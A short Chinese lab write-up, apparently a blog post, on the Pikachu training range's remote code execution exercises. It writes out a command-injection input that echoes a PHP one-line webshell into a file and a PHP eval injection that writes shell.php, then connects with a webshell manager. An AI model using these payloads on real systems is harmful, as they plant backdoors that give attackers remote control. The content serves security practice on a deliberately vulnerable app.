Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
xcbrand2 分钟前
餐饮品牌全案公司哪家可靠
运维·python
apl3597 分钟前
GUI 型 DevOps 平台的天花板,Ashby 在 1956 年就画好了
运维·devops
jinanwuhuaguo11 分钟前
OpenClaw执行奇点——因果链折叠与责任悬置的时间哲学(第十九篇)
前端·人工智能·安全·重构·openclaw
云动课堂16 分钟前
【运维实战】MySQL 8.0 数据库 · 一键自动化部署方案 (适配银河麒麟 V10 / 龙蜥 8 / Rocky Linux 8 / CentOS 8)
linux·运维·数据库
cui_ruicheng17 分钟前
Linux进程间通信(一):管道与IPC基础
linux·运维·服务器
Dola_Zou20 分钟前
高端医疗设备软件的数字安全与授权演进
安全·健康医疗·软件加密
treesforest38 分钟前
IP查询接口调用完全指南:从入门到企业级实战
大数据·网络·安全·网络安全·ip
一叶龙洲1 小时前
Ubuntu开机无法用向日葵远程控制
linux·运维·ubuntu
计算机安禾1 小时前
【Linux从入门到镜头】第29篇:文本处理三剑客(下)——awk 数据处理神器
linux·运维·服务器
Swift社区1 小时前
AI 为什么需要“确认”?OpenClaw 的安全启示
人工智能·安全·openclaw
热门推荐
01GitHub 镜像站点02近期有什么ai的新消息,新动态? 2026.4月032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot05Codex 接入 DeepSeek API 完整配置文档06【AI】2026 年具身智能模型和世界模型总结07在Windows 11上安装Docker的踩坑记录08零基础教你claude code 接入 deepseek V4092026年AI前瞻:量子AI、具身智能与科学发现的新纪元10VSCode + Copilot下:配置并使用 DeepSeek